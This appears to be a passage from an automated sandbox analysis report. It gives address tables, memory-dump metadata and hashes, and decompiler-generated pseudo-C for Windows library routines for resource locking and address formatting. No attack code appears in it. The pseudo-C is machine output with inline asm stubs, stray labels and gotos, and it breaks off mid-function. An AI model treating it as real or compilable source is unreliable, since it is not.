                                          0x00790b49
                                          0x00000000
                                          0x00000000
                                          0x00790b4f
                                          0x00790b50
                                          0x00000000
                                          0x00000000
                                          0x00790b56
                                          0x00790b62
                                          0x00790b7c
                                          0x00790bac
                                          0x00790a0f
                                          0x007beaaa
                                          0x00000000
                                          0x007beac4
                                          0x007beac4
                                          0x00790bd0
                                          0x00790bd0
                                          0x00790bd4
                                          0x00790bd9
                                          0x00000000
                                          0x00000000
                                          0x00790bdb
                                          0x00790be0
                                          0x007beb0e
                                          0x00790a1a
                                          0x00000000
                                          0x00790a1a
                                          0x007beb1a
                                          0x007beb1f
                                          0x007beb27
                                          0x00000000
                                          0x00000000
                                          0x007beb36
                                          0x00000000
                                          0x007beb36
                                          0x00790bea
                                          0x00000000
                                          0x00000000
                                          0x00790bf6
                                          0x00790c00
                                          0x00790c03
                                          0x00790c0b
                                          0x00000000
                                          0x00790c0b
                                          0x007beaaa
                                          0x00000000
                                          0x00790a15
                                          0x00790bb6
                                          0x00000000
                                          0x00790bc6
                                          0x00790bc6
                                          0x00790bcb
                                          0x00790c15
                                          0x00000000
                                          0x00000000
                                          0x00790c1d
                                          0x00790c20
                                          0x00790c21
                                          0x00790c24
                                          0x00790c24
                                          0x00790c26
                                          0x00000000
                                          0x00790c26
                                          0x00790bcd
                                          0x00000000
                                          0x00790bcd
                                          0x00790b89
                                          0x00790b89
                                          0x00790b90
                                          0x00000000
                                          0x00000000
                                          0x00790b96
                                          0x00000000
                                          0x00790b96
                                          0x00790a04
                                          0x00790a04
                                          0x00790b9a
                                          0x00790b9a
                                          0x00790b9b
                                          0x00790b9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00790ba5
                                          0x00790ac7
                                          0x00790aca
                                          0x007beacf
                                          0x00000000
                                          0x007beade
                                          0x007beade
                                          0x007beae3
                                          0x00000000
                                          0x00000000
                                          0x007beaf3
                                          0x007beaf6
                                          0x007beaf7
                                          0x007beafe
                                          0x007beb01
                                          0x00000000
                                          0x007beb01
                                          0x007beacf
                                          0x00790ad0
                                          0x00790ad4
                                          0x00000000
                                          0x00000000
                                          0x00790ada
                                          0x00790ae6
                                          0x00790c34
                                          0x00000000
                                          0x00790c47
                                          0x00790c49
                                          0x00790c4a
                                          0x00790c4e
                                          0x00790c51
                                          0x00790c54
                                          0x00790c57
                                          0x00790c5a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00790c60
                                          0x00790afb
                                          0x00790afe
                                          0x00790b02
                                          0x00790b05
                                          0x00790b08
                                          0x00000000
                                          0x00790b08
                                          0x00790ae6
                                          0x00790b44
                                          0x007909f8
                                          0x007909f8
                                          0x007909f9
                                          0x00000000
                                          0x00000000
                                          0x007beaa0
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 02ca4966c9e4d626cc6e30b786d3cf5bc152c8cae27edc8fa855d7040fa470c0
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: D3A19D7592430ADFCF24CF64E8496FEB7B5EF16304F24856AD812A7241D7389A41CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00790554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E00790554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
									_push(_t144);
									_push(0);
									_t51 = E0074F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00794FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E007A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E007D217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E007A3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00793915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
												_push(_t138);
												_push(0);
												_t58 = E0074F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00794FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E007A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E007D217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E007A3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00793915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00775384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0074F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00793915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00793915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00793915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00775329(_t110, _t138);
																_t69 = E007753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                          0x0079055a
                                          0x0079055d
                                          0x00790563
                                          0x00790566
                                          0x007905d8
                                          0x007905e2
                                          0x007905e5
                                          0x00000000
                                          0x007905e7
                                          0x007905e7
                                          0x007905ea
                                          0x007905f3
                                          0x007905f3
                                          0x00790568
                                          0x00790568
                                          0x00790568
                                          0x00790569
                                          0x00790569
                                          0x00790569
                                          0x0079056b
                                          0x00000000
                                          0x00000000
                                          0x007b217f
                                          0x007b2183
                                          0x007b225b
                                          0x007b225f
                                          0x007b2189
                                          0x007b218c
                                          0x007b218f
                                          0x007b2194
                                          0x007b2199
                                          0x007b219d
                                          0x007b21a0
                                          0x007b21a2
                                          0x007b21ce
                                          0x007b21ce
                                          0x007b21ce
                                          0x007b21d0
                                          0x007b21d6
                                          0x007b21de
                                          0x007b21e2
                                          0x007b21e8
                                          0x007b21e9
                                          0x007b21ec
                                          0x007b21f1
                                          0x007b21f6
                                          0x00000000
                                          0x00000000
                                          0x007b21f8
                                          0x007b21fb
                                          0x007b2206
                                          0x007b220b
                                          0x007b220c
                                          0x007b2217
                                          0x007b2226
                                          0x007b222b
                                          0x007b222c
                                          0x007b222f
                                          0x007b2232
                                          0x007b2235
                                          0x007b2235
                                          0x007b223a
                                          0x007b223f
                                          0x007b2241
                                          0x007b2243
                                          0x007b2248
                                          0x007b2248
                                          0x007b224d
                                          0x007b224f
                                          0x007b2262
                                          0x007b2263
                                          0x007b2268
                                          0x007b2269
                                          0x007b2269
                                          0x007b2269
                                          0x007b226d
                                          0x00000000
                                          0x00000000
                                          0x007b2276
                                          0x007b2279
                                          0x007b227e
                                          0x007b2283
                                          0x007b2287
                                          0x007b228a
                                          0x007b228d
                                          0x007b228f
                                          0x007b22bc
                                          0x007b22bc
                                          0x007b22bc
                                          0x007b22be
                                          0x007b22c4
                                          0x007b22cc
                                          0x007b22d0
                                          0x007b22d6
                                          0x007b22d7
                                          0x007b22da
                                          0x007b22df
                                          0x007b22e4
                                          0x00000000
                                          0x00000000
                                          0x007b22e6
                                          0x007b22e9
                                          0x007b22f4
                                          0x007b22f9
                                          0x007b22fa
                                          0x007b2305
                                          0x007b2314
                                          0x007b2319
                                          0x007b231a
                                          0x007b231d
                                          0x007b2320
                                          0x007b2323
                                          0x007b2323
                                          0x007b2328
                                          0x007b232d
                                          0x007b232f
                                          0x007b2331
                                          0x007b2336
                                          0x007b2336
                                          0x007b233b
                                          0x007b233d
                                          0x007b2350
                                          0x007b2351
                                          0x007b2356
                                          0x007b2359
                                          0x007b2359
                                          0x007b235b
                                          0x007b235d
                                          0x00775367
                                          0x0077536b
                                          0x00775372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b2363
                                          0x007b2363
                                          0x007b2369
                                          0x007b236a
                                          0x007b236c
                                          0x007b2371
                                          0x007b2373
                                          0x00000000
                                          0x007b2379
                                          0x007b2379
                                          0x007b237a
                                          0x007b237f
                                          0x007b237f
                                          0x007b2385
                                          0x007b2386
                                          0x007b2389
                                          0x007b238e
                                          0x007b2390
                                          0x00775378
                                          0x0077537c
                                          0x007b2396
                                          0x007b2396
                                          0x007b2397
                                          0x007b239c
                                          0x007b23a2
                                          0x007b23a3
                                          0x007b23a6
                                          0x007b23ab
                                          0x007b23ad
                                          0x00000000
                                          0x007b23b3
                                          0x007b23b3
                                          0x007b23b4
                                          0x007b23b9
                                          0x007b23ba
                                          0x007b23ba
                                          0x007b23bc
                                          0x007b23bf
                                          0x00000000
                                          0x00000000
                                          0x007a9153
                                          0x007a9158
                                          0x007a915a
                                          0x007a915e
                                          0x007a9160
                                          0x00000000
                                          0x007a9166
                                          0x007a9166
                                          0x007a9171
                                          0x007a9176
                                          0x007a9176
                                          0x00000000
                                          0x007a9160
                                          0x007b23c6
                                          0x007b23ce
                                          0x007b23d7
                                          0x007b23d7
                                          0x007b23ad
                                          0x007b2390
                                          0x007b2373
                                          0x007b233f
                                          0x007b233f
                                          0x00000000
                                          0x007b233f
                                          0x007b2291
                                          0x007b2291
                                          0x007b2293
                                          0x007b2295
                                          0x007b229a
                                          0x007b22a1
                                          0x007b22a3
                                          0x007b22a7
                                          0x007b22a9
                                          0x00000000
                                          0x00000000
                                          0x007b22ab
                                          0x007b22ad
                                          0x007b22af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b22af
                                          0x007b22b1
                                          0x007b22b4
                                          0x007b22b4
                                          0x007b22b6
                                          0x007753be
                                          0x007753be
                                          0x007753be
                                          0x007753c0
                                          0x00000000
                                          0x00000000
                                          0x007753cb
                                          0x007753ce
                                          0x007753d0
                                          0x007753d4
                                          0x007753d6
                                          0x00000000
                                          0x007753d8
                                          0x007753e3
                                          0x007753ea
                                          0x007753ea
                                          0x00000000
                                          0x007753d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b22b6
                                          0x00000000
                                          0x007b228f
                                          0x007b2349
                                          0x007b234d
                                          0x007b2251
                                          0x007b2251
                                          0x00000000
                                          0x007b2251
                                          0x007b21a4
                                          0x007b21a4
                                          0x007b21a6
                                          0x007b21a8
                                          0x007b21ac
                                          0x007b21b6
                                          0x007b21b8
                                          0x007b21bc
                                          0x007b21be
                                          0x00000000
                                          0x00000000
                                          0x007b21c0
                                          0x007b21c2
                                          0x007b21c4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b21c4
                                          0x007b21c6
                                          0x007b21c6
                                          0x007b21c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b21c8
                                          0x007b21a2
                                          0x00000000
                                          0x007b2183
                                          0x0079057b
                                          0x0079057d
                                          0x00790581
                                          0x00790583
                                          0x007b2178
                                          0x00000000
                                          0x00790589
                                          0x0079058f
                                          0x0079058f
                                          0x00790583
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B2206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                          • Instruction ID: a62f9aeb2d7069c87f0c8695fbf6f89927c9fdf10379f9a1149d0bfdbfc04e07
                                          • Opcode Fuzzy Hash: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                          • Instruction Fuzzy Hash: B5513B71701205AFEB14CE18DC86FE633A9AB94715F218229FD54DF286DA79EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E007914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x832088; // 0x76c6953a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00787707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E007913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00787707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00787707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00752340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0075E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                          0x007914c0
                                          0x007914cb
                                          0x007914d2
                                          0x007914d6
                                          0x007914da
                                          0x007914de
                                          0x007914e3
                                          0x0079157a
                                          0x0079157a
                                          0x007914f1
                                          0x007914f3
                                          0x007bea0f
                                          0x00000000
                                          0x007bea15
                                          0x00000000
                                          0x007bea15
                                          0x007914f9
                                          0x007914f9
                                          0x007914fe
                                          0x00791504
                                          0x007bea1a
                                          0x007bea1f
                                          0x007bea21
                                          0x007bea22
                                          0x007bea27
                                          0x007bea2a
                                          0x007bea2a
                                          0x00791515
                                          0x00791517
                                          0x0079156d
                                          0x00791572
                                          0x00791575
                                          0x00791575
                                          0x0079151e
                                          0x007bea50
                                          0x007bea55
                                          0x007bea58
                                          0x007bea58
                                          0x0079152e
                                          0x00791531
                                          0x00791533
                                          0x00000000
                                          0x00791535
                                          0x00791541
                                          0x00791549
                                          0x00791549
                                          0x00791533
                                          0x007914f3
                                          0x00791559

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 007BEA22
                                            • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 0079146B
                                            • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 00791490
                                          • ___swprintf_l.LIBCMT ref: 0079156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                          • Instruction ID: 96b89cf3bec01f04af9cbe77cba7ec42d8354870ed29bebd58194497afea65b8
                                          • Opcode Fuzzy Hash: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                          • Instruction Fuzzy Hash: 0E21B17290061ADBCF20EE54DC45AEA73BCAB50701F964451FD46D3241EB78EA688BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 45%
                                          			E007753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008301c0;
									_push(_t92);
									_push(0);
									_t37 = E0074F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00794FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E007A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E007D217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E007A3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00793915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00775384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0074F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00793915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0074F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00793915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0074F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00793915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00775329(_t74, _t92);
													_push(1);
													_t48 = E007753A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
